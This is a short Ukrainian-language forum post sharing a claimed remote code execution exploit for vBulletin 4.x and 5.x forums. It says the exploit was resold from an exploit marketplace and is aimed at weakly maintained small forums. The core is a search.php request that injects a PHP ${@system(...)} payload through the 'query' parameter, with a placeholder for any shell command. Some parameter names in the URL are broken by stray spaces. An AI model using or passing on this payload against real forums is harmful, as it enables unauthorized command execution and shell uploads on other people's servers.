Уразливість в форумах vBulletin

10

На топовий форумах звичайно не працює, але на школофорумах цілком. Інфа була злита давно, але тут не було!
[Інформація]
-Вразливість продається тут: 1337 day
-Уразливі версії: vBulletin v4.x.x and 5.х.x
-Ціна на офф. сайті: 7000$ (~245000 рублів)
-Поширеність на 02.03.2014: 5/5
-Платформа: PHP
-Можливості: Shell Upload / Remote Code Execute

[Продається вразливість]

search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query= %24%7b%40system(‘pwd’)%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthre adid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
# «query» param
# php code to inject : ${@system(‘put command here’)}

ВАЖЛИВО, для того що-б юзати даний йшов потрібно мати знання з PHP